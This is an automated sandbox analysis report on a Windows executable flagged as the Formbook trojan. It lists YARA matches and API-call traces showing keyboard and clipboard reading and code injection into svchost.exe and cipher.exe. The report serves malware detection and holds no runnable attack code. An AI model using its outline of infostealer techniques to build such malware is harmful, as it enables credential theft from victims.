Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F7425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard, 0_2_00F7425A
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F60219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00F60219
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00F8CDAC

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: This is a third-party compiled AutoIt script. 0_2_00F03B4C
Source: PI No 20000814C.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_01cdad44-7
Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_1cf8f811-4
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F03633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow, 0_2_00F03633
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W, 0_2_00F8C27C
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8C220 NtdllDialogWndProc_W, 0_2_00F8C220
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W, 0_2_00F8C49C
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W, 0_2_00F8C788
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W, 0_2_00F8C8EE
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8C86D SendMessageW,NtdllDialogWndProc_W, 0_2_00F8C86D
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8CBF9 NtdllDialogWndProc_W, 0_2_00F8CBF9
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8CBAE NtdllDialogWndProc_W, 0_2_00F8CBAE
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8CB7F NtdllDialogWndProc_W, 0_2_00F8CB7F
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8CB50 NtdllDialogWndProc_W, 0_2_00F8CB50
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8CC2E ClientToScreen,NtdllDialogWndProc_W, 0_2_00F8CC2E
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00F8CDAC
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8CD6C GetWindowLongW,NtdllDialogWndProc_W, 0_2_00F8CD6C
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F01290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient, 0_2_00F01290
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F01287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74A3C8D0,NtdllDialogWndProc_W, 0_2_00F01287
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F016DE GetParent,NtdllDialogWndProc_W, 0_2_00F016DE
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8D6C6 NtdllDialogWndProc_W, 0_2_00F8D6C6
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F016B5 NtdllDialogWndProc_W, 0_2_00F016B5
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F0167D NtdllDialogWndProc_W, 0_2_00F0167D
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W, 0_2_00F8D74C
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F0189B NtdllDialogWndProc_W, 0_2_00F0189B
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8DA9A NtdllDialogWndProc_W, 0_2_00F8DA9A
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8BF4D NtdllDialogWndProc_W,CallWindowProcW, 0_2_00F8BF4D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0049AF03 NtClose, 2_2_0049AF03
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72B60 NtClose,LdrInitializeThunk, 2_2_02F72B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_02F72DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk, 2_2_02F735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F74340 NtSetContextThread, 2_2_02F74340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F74650 NtSuspendThread, 2_2_02F74650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72AF0 NtWriteFile, 2_2_02F72AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72AD0 NtReadFile, 2_2_02F72AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72AB0 NtWaitForSingleObject, 2_2_02F72AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72BF0 NtAllocateVirtualMemory, 2_2_02F72BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72BE0 NtQueryValueKey, 2_2_02F72BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72BA0 NtEnumerateValueKey, 2_2_02F72BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72B80 NtQueryInformationFile, 2_2_02F72B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72EE0 NtQueueApcThread, 2_2_02F72EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72EA0 NtAdjustPrivilegesToken, 2_2_02F72EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72E80 NtReadVirtualMemory, 2_2_02F72E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72E30 NtWriteVirtualMemory, 2_2_02F72E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72FE0 NtCreateFile, 2_2_02F72FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72FB0 NtResumeThread, 2_2_02F72FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72FA0 NtQuerySection, 2_2_02F72FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72F90 NtProtectVirtualMemory, 2_2_02F72F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72F60 NtCreateProcessEx, 2_2_02F72F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72F30 NtCreateSection, 2_2_02F72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72CF0 NtOpenProcess, 2_2_02F72CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72CC0 NtQueryVirtualMemory, 2_2_02F72CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72CA0 NtQueryInformationToken, 2_2_02F72CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72C70 NtFreeVirtualMemory, 2_2_02F72C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72C60 NtCreateKey, 2_2_02F72C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72C00 NtQueryInformationProcess, 2_2_02F72C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72DD0 NtDelayExecution, 2_2_02F72DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72DB0 NtEnumerateKey, 2_2_02F72DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72D30 NtUnmapViewOfSection, 2_2_02F72D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72D10 NtMapViewOfSection, 2_2_02F72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72D00 NtSetInformationFile, 2_2_02F72D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F73090 NtSetValueKey, 2_2_02F73090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F73010 NtOpenDirectoryObject, 2_2_02F73010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F739B0 NtGetContextThread, 2_2_02F739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F73D70 NtOpenThread, 2_2_02F73D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F73D10 NtOpenProcessToken, 2_2_02F73D10
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A4650 NtSuspendThread,LdrInitializeThunk, 4_2_053A4650
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A4340 NtSetContextThread,LdrInitializeThunk, 4_2_053A4340
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2D30 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_053A2D30
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2D10 NtMapViewOfSection,LdrInitializeThunk, 4_2_053A2D10
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_053A2DF0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2DD0 NtDelayExecution,LdrInitializeThunk, 4_2_053A2DD0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_053A2C70
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2C60 NtCreateKey,LdrInitializeThunk, 4_2_053A2C60
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2CA0 NtQueryInformationToken,LdrInitializeThunk, 4_2_053A2CA0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2F30 NtCreateSection,LdrInitializeThunk, 4_2_053A2F30
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2FB0 NtResumeThread,LdrInitializeThunk, 4_2_053A2FB0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2FE0 NtCreateFile,LdrInitializeThunk, 4_2_053A2FE0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2E80 NtReadVirtualMemory,LdrInitializeThunk, 4_2_053A2E80
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2EE0 NtQueueApcThread,LdrInitializeThunk, 4_2_053A2EE0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2B60 NtClose,LdrInitializeThunk, 4_2_053A2B60
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2BA0 NtEnumerateValueKey,LdrInitializeThunk, 4_2_053A2BA0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_053A2BF0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2BE0 NtQueryValueKey,LdrInitializeThunk, 4_2_053A2BE0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2AF0 NtWriteFile,LdrInitializeThunk, 4_2_053A2AF0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2AD0 NtReadFile,LdrInitializeThunk, 4_2_053A2AD0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A35C0 NtCreateMutant,LdrInitializeThunk, 4_2_053A35C0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A39B0 NtGetContextThread,LdrInitializeThunk, 4_2_053A39B0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2D00 NtSetInformationFile, 4_2_053A2D00
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2DB0 NtEnumerateKey, 4_2_053A2DB0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2C00 NtQueryInformationProcess, 4_2_053A2C00
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2CF0 NtOpenProcess, 4_2_053A2CF0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2CC0 NtQueryVirtualMemory, 4_2_053A2CC0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2F60 NtCreateProcessEx, 4_2_053A2F60
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2FA0 NtQuerySection, 4_2_053A2FA0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2F90 NtProtectVirtualMemory, 4_2_053A2F90
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2E30 NtWriteVirtualMemory, 4_2_053A2E30
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2EA0 NtAdjustPrivilegesToken, 4_2_053A2EA0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2B80 NtQueryInformationFile, 4_2_053A2B80
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A2AB0 NtWaitForSingleObject, 4_2_053A2AB0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A3010 NtOpenDirectoryObject, 4_2_053A3010
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A3090 NtSetValueKey, 4_2_053A3090
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A3D10 NtOpenProcessToken, 4_2_053A3D10
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A3D70 NtOpenThread, 4_2_053A3D70
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032D7B90 NtReadFile, 4_2_032D7B90
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032D7A30 NtCreateFile, 4_2_032D7A30
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032D7E70 NtAllocateVirtualMemory, 4_2_032D7E70
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032D7D20 NtClose, 4_2_032D7D20
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032D7C80 NtDeleteFile, 4_2_032D7C80
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F640B1: CreateFileW,_memset,DeviceIoControl,CloseHandle, 0_2_00F640B1
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F58858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74B55590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle, 0_2_00F58858
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00F6545F
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F0E800 0_2_00F0E800
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F2DBB5 0_2_00F2DBB5
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F0E060 0_2_00F0E060
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F8804A 0_2_00F8804A
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F14140 0_2_00F14140
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F22405 0_2_00F22405
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F36522 0_2_00F36522
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F3267E 0_2_00F3267E
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F80665 0_2_00F80665
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F16843 0_2_00F16843
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F2283A 0_2_00F2283A
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F389DF 0_2_00F389DF
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F80AE2 0_2_00F80AE2
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F36A94 0_2_00F36A94
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F18A0E 0_2_00F18A0E
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F68B13 0_2_00F68B13
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F5EB07 0_2_00F5EB07
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F2CD61 0_2_00F2CD61
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F37006 0_2_00F37006
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F13190 0_2_00F13190
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F1710E 0_2_00F1710E
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F01287 0_2_00F01287
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F233C7 0_2_00F233C7
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F2F419 0_2_00F2F419
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F216C4 0_2_00F216C4
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F15680 0_2_00F15680
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F278D3 0_2_00F278D3
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F158C0 0_2_00F158C0
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F21BB8 0_2_00F21BB8
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F39D05 0_2_00F39D05
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F0FE40 0_2_00F0FE40
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F2BFE6 0_2_00F2BFE6
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F21FD0 0_2_00F21FD0
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_018E3690 0_2_018E3690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004721D0 2_2_004721D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00472A5D 2_2_00472A5D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00472A60 2_2_00472A60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00471A60 2_2_00471A60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00471220 2_2_00471220
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047FA9A 2_2_0047FA9A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047FAA3 2_2_0047FAA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0049D303 2_2_0049D303
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004863CF 2_2_004863CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004863D3 2_2_004863D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047FCC3 2_2_0047FCC3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047DD43 2_2_0047DD43
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047255F 2_2_0047255F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00472560 2_2_00472560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00471530 2_2_00471530
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00472F60 2_2_00472F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC02C0 2_2_02FC02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030003E6 2_2_030003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFA352 2_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030001AA 2_2_030001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF81CC 2_2_02FF81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF41A2 2_2_02FF41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC8158 2_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDA118 2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30100 2_2_02F30100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5C6E0 2_2_02F5C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3C7C0 2_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F64750 2_2_02F64750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEE4F6 2_2_02FEE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03000591 2_2_03000591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF2446 2_2_02FF2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE4420 2_2_02FE4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF6BD7 2_2_02FF6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFAB40 2_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E8F0 2_2_02F6E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F268B8 2_2_02F268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300A9A6 2_2_0300A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4A840 2_2_02F4A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F42840 2_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F56962 2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFEEDB 2_2_02FFEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52E90 2_2_02F52E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFCE93 2_2_02FFCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40E59 2_2_02F40E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFEE26 2_2_02FFEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4CFE0 2_2_02F4CFE0
